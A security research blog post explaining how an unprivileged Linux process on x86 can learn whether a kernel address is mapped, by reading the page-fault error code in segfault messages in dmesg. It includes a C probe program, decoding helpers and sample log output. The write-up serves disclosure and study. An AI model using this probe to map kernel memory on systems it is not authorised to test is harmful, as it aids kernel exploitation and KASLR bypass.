It's Bugs All the Way Down

Security Research by Dan Rosenberg

A Linux Memory Trick

I discovered a neat little trick on Linux: on x86 (and a few other less common architectures), it’s possible to determine from an unprivileged process whether an address residing within the kernel address space is mapped or unmapped.

The top-level page fault handler on x86 is do_page_fault(), found in arch/x86/mm/fault.c. When the CPU fires a page fault exception, it pushes an error code onto the stack, which is accessible as an argument to the page fault handler.

When a userland process attempts to access unmapped memory or memory whose page permissions do not allow the desired type of access, the following code path is invoked:

do_page_fault()
__do_page_fault()
bad_area_nosemaphore()
__bad_area_nosemaphore()
show_signal_msg()

This last function prints a message to the kernel syslog with information about the unhandled SIGSEGV that is raised as a result of the invalid memory access:

static inline void
show_signal_msg(struct pt_regs *regs, unsigned long error_code,
        unsigned long address, struct task_struct *tsk)
{
    if (!unhandled_signal(tsk, SIGSEGV))
        return;
        
    if (!printk_ratelimit())
        return;
        
    printk("%s%s[%d]: segfault at %lx ip %p sp %p error %lx",
        task_pid_nr(tsk) > 1 ? KERN_INFO : KERN_EMERG,
        tsk->comm, task_pid_nr(tsk), address,
        (void *)regs->ip, (void *)regs->sp, error_code);
    
    print_vma_addr(KERN_CONT " in ", regs->ip);

    printk(KERN_CONT "\n");
}

Note that the error_code printed to the syslog has been passed down all the way from the top-level page fault handler. It's worth looking at what the bits of this error code mean. Most importantly, bit 0 is the Present flag: it is 0 if the fault was caused by a non-present page and 1 if it was caused by a page-level protection violation on a present page. Bit 1 is the Read/Write flag, which is 0 for a read fault and 1 for a write fault, and bit 2 is the User/Supervisor flag, which is 0 if the faulting access was made in supervisor (kernel) mode and 1 if it was made in user mode.
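To make the bit layout concrete, here is a minimal sketch of a decoder for the three low bits of the error code as it appears after "error" in the syslog line. The macro, struct, and function names (PF_ERR_*, struct pf_error, pf_decode, pf_describe) are hypothetical and chosen for illustration; they are not the kernel's own identifiers.

```c
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical names for bits 0-2 of the x86 page fault error code. */
#define PF_ERR_PRESENT (1UL << 0) /* 0: non-present page, 1: protection violation */
#define PF_ERR_WRITE   (1UL << 1) /* 0: read access, 1: write access */
#define PF_ERR_USER    (1UL << 2) /* 0: supervisor mode, 1: user mode */

struct pf_error {
    bool present; /* the faulting address mapped a present page */
    bool write;   /* the access was a write rather than a read */
    bool user;    /* the access came from user mode */
};

/* Split an error code, as printed after "error" in the syslog, into flags. */
static struct pf_error pf_decode(unsigned long error_code)
{
    struct pf_error e = {
        .present = (error_code & PF_ERR_PRESENT) != 0,
        .write   = (error_code & PF_ERR_WRITE) != 0,
        .user    = (error_code & PF_ERR_USER) != 0,
    };
    return e;
}

/* Write a one-line description of error_code into buf. */
static void pf_describe(unsigned long error_code, char *buf, size_t len)
{
    struct pf_error e = pf_decode(error_code);

    snprintf(buf, len, "%s from %s mode on a %s page",
             e.write ? "write" : "read",
             e.user ? "user" : "supervisor",
             e.present ? "present" : "non-present");
}
```

For example, pf_describe(5, ...) produces "read from user mode on a present page", while pf_describe(4, ...) produces "read from user mode on a non-present page".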

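In other words, a user-mode access to any kernel address faults, but for different reasons: if the address is mapped, the access violates the page's supervisor-only protection and the Present bit is set; if it is unmapped, the Present bit is clear. So regardless of whether the faulting address lies in user or kernel space, the error code logged to the syslog reveals whether it corresponds to a present or absent page. This can be verified as follows: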

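$ cat trick.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    volatile int *ptr;  /* volatile: keep the load even when optimizing */
    int foo;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <hex address>\n", argv[0]);
        return 1;
    }
    ptr = (volatile int *)strtoul(argv[1], NULL, 16);
    foo = *ptr;         /* any user-mode access to a kernel address faults */
    (void)foo;
    return 0;
}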

$ ./trick ffffffff81aa3690
Segmentation fault (core dumped)
$ ./trick ffffffffc1aa3690
Segmentation fault (core dumped)
$ dmesg | grep segfault
[391396.756467] trick[31865]: segfault at ffffffff81aa3690 ip 0000000000400528 sp 00007fff7c026ba0 error 5 in trick[400000+1000]
[391404.736606] trick[31872]: segfault at ffffffffc1aa3690 ip 0000000000400528 sp 00007fff170fac60 error 4 in trick[400000+1000]

The first invocation deliberately causes an access violation on a mapped kernel address, resulting in an error code of 5 (a read violation from user mode on a present page). The second invocation causes an access violation on an unmapped kernel address, resulting in an error code of 4 (a read violation from user mode on a non-present page).
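Reading the result by eye works, but the classification can also be done mechanically. The sketch below assumes log lines in exactly the format produced by the show_signal_msg() code shown earlier ("segfault at <hex address> ... error <hex code>") and a 64-bit unsigned long; the function name parse_segfault_line is hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse a "segfault at ... error N" line as printed by show_signal_msg().
 * On success, store the faulting address and whether the page was present
 * (bit 0 of the error code) and return true; otherwise return false.
 */
static bool parse_segfault_line(const char *line, unsigned long *addr,
                                bool *mapped)
{
    const char *p = strstr(line, "segfault at ");
    unsigned long error_code;

    if (p == NULL || sscanf(p, "segfault at %lx", addr) != 1)
        return false;

    /* The error code is printed in hex (%lx) after " error ". */
    p = strstr(p, " error ");
    if (p == NULL || sscanf(p, " error %lx", &error_code) != 1)
        return false;

    *mapped = (error_code & 1UL) != 0; /* bit 0: Present flag */
    return true;
}
```

Fed the two dmesg lines above, this reports ffffffff81aa3690 as mapped (error 5) and ffffffffc1aa3690 as unmapped (error 4).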

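This trick only works if you can read the kernel log in the first place, so the dmesg_restrict sysctl must be disabled. As the code above shows, the message is also only logged if the process leaves SIGSEGV unhandled and printk_ratelimit() does not suppress it.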
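An unprivileged process can check this precondition itself. The following is a minimal sketch, assuming the sysctl is exposed at /proc/sys/kernel/dmesg_restrict; the helper name read_dmesg_restrict is hypothetical. Keep in mind that a process with CAP_SYSLOG can read the log regardless of this setting.

```c
#include <stdio.h>

/*
 * Read /proc/sys/kernel/dmesg_restrict. Return 0 if unprivileged users
 * may read the kernel log, 1 if access is restricted, or -1 if the value
 * could not be read (for example, the sysctl does not exist).
 */
static int read_dmesg_restrict(void)
{
    FILE *f = fopen("/proc/sys/kernel/dmesg_restrict", "r");
    int value;

    if (f == NULL)
        return -1;
    if (fscanf(f, "%d", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}
```

A result of 0 means the segfault messages, and therefore the Present bit, are visible to the probing process.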

This entry was posted on Wednesday, February 6th, 2013 at 6:23 pm and is filed under Kernel, Linux.